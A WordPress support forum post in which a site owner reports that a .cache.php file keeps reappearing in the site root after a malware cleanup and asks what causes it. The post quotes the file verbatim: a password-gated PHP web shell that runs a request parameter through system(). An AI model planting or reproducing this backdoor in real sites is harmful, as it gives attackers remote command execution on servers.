.cache.php Page Keeps Reappearing in WordPress Root
-
This is the site: https://waganimalrescue.com/
I just cleaned out some malicious files and code with the help of Sucuri. Everything seems to be fine now except that every hour or so a .cache.php file is added to the root wordpress directory.
This is the code .cache.php contains:
<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>
I’ve tried searching for this issue but I haven’t had any luck. Any ideas what’s causing this or where I should look? Sucuri continues to say everything else looks fine.
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘.cache.php Page Keeps Reappearing in WordPress Root’ is closed to new replies.